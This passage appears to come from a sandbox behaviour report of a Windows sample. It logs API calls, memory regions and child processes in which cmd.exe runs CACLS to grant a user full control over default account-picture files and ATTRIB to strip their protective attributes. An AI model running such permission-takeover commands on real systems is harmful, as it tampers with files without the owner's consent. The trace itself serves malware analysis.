0x63 [0185.569] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.569] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.569] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.569] GetLastError () returned 0x2 [0185.569] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.569] GetLastError () returned 0x2 [0185.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0x25e4d8 [0185.569] FindClose (in: hFindFile=0x25e4d8 | out: hFindFile=0x25e4d8) returned 1 [0185.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.570] GetLastError () returned 0x2 [0185.570] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0x25e4d8 [0185.570] FindClose (in: hFindFile=0x25e4d8 | out: hFindFile=0x25e4d8) returned 1 [0185.570] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.570] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.570] GetConsoleTitleW (in: lpConsoleTitle=0x16f2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.570] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f180, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f248 | out: lpAttributeList=0x16f180, lpSize=0x16f248) returned 1 [0185.570] UpdateProcThreadAttribute (in: lpAttributeList=0x16f180, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f240, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f180, lpPreviousValue=0x0) returned 1 [0185.570] GetStartupInfoW (in: lpStartupInfo=0x16f13c | out: lpStartupInfo=0x16f13c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.570] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.570] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f1dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f228 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"", lpProcessInformation=0x16f228*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd70, dwThreadId=0xef0)) returned 1 [0185.572] CloseHandle (hObject=0x50) returned 1 [0185.572] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.572] GetEnvironmentStringsW () returned 0x262410* [0185.572] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0185.572] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0185.608] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x16f11c | out: lpExitCode=0x16f11c*=0x0) returned 1 [0185.608] CloseHandle (hObject=0x4c) returned 1 [0185.608] _vsnwprintf (in: _Buffer=0x16f264, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f128 | out: _Buffer="00000000") returned 8 [0185.608] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.608] GetEnvironmentStringsW () returned 0x262410* [0185.608] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0185.608] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.608] GetEnvironmentStringsW () returned 0x262410* [0185.608] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0185.608] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f180 | out: lpAttributeList=0x16f180) [0185.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.608] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.609] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.609] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.609] SetConsoleInputExeNameW () returned 0x1 [0185.609] GetConsoleOutputCP () returned 0x1b5 [0185.609] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.609] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.609] exit (_Code=0) Process: id = "374" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16d80" os_pid = "0xe1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "373" os_parent_pid = "0xf70" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26483 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26484 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26485 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26486 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26487 start_va = 0xfb0000 end_va = 0xfb8fff entry_point = 0xfb0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26488 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26489 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26490 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26491 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26492 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26493 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26494 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26495 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26496 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26497 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 26498 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26499 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26500 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26501 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26502 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26503 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26504 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 535 os_tid = 0xd30 Thread: id = 536 os_tid = 0xfc8 Process: id = "375" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c20" os_pid = "0xd70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "373" os_parent_pid = "0xf70" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26505 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26506 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26507 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26508 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 26509 start_va = 0x3e0000 end_va = 0x3e6fff entry_point = 0x3e0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26510 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26511 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26512 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26513 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26514 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26515 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26516 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26517 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26518 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 26519 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 26520 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26521 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26522 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26523 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26524 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26525 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26526 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26527 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26528 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26529 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26530 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26531 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26532 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26533 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26534 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 537 os_tid = 0xef0 Process: id = "376" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0xe9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26535 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26536 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26537 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26538 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26539 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26540 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26541 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26542 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26543 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26544 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26545 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26546 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26547 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26548 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 26549 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 26550 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26551 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26552 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26553 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26554 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26555 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26556 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26557 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26558 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26559 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 26560 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26561 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26562 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26563 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 26564 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26565 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26566 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 26567 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 26568 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 26569 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 538 os_tid = 0xe5c [0185.835] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f87c | out: lpSystemTimeAsFileTime=0x26f87c*(dwLowDateTime=0xa3aa6960, dwHighDateTime=0x1d440a9)) [0185.835] GetCurrentProcessId () returned 0xe9c [0185.835] GetCurrentThreadId () returned 0xe5c [0185.835] GetTickCount () returned 0x351d6 [0185.835] QueryPerformanceCounter (in: lpPerformanceCount=0x26f874 | out: lpPerformanceCount=0x26f874*=24262435046) returned 1 [0185.836] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0185.836] __set_app_type (_Type=0x1) [0185.836] __p__fmode () returned 0x76b331f4 [0185.836] __p__commode () returned 0x76b331fc [0185.836] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0185.836] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0185.836] GetCurrentThreadId () returned 0xe5c [0185.836] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe5c) returned 0x38 [0185.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.836] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0185.836] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.836] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0185.837] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f80c | out: phkResult=0x26f80c*=0x0) returned 0x2 [0185.837] VirtualQuery (in: lpAddress=0x26f843, lpBuffer=0x26f7dc, dwLength=0x1c | out: lpBuffer=0x26f7dc*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.837] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f7dc, dwLength=0x1c | out: lpBuffer=0x26f7dc*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0185.837] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f7dc, dwLength=0x1c | out: lpBuffer=0x26f7dc*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0185.837] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f7dc, dwLength=0x1c | out: lpBuffer=0x26f7dc*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.837] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f7dc, dwLength=0x1c | out: lpBuffer=0x26f7dc*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0185.837] GetConsoleOutputCP () returned 0x1b5 [0185.837] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.837] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0185.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.837] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0185.837] _get_osfhandle (_FileHandle=1) returned 0x7 